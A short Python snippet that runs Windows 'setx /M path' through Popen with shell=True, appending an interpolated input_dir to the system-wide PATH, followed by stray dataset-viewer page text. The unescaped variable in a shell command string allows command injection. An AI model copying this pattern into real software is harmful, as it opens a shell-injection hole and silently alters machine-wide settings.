proc = Popen(f'setx /M path "%PATH%;{input_dir}"', stdin=PIPE,
stdout=PIPE, stderr=PIPE, shell=True)
_, _ = proc.communicate()
|
Subsets and Splits
No saved queries yet
Save your SQL queries to embed, download, and access them later. Queries will appear here once saved.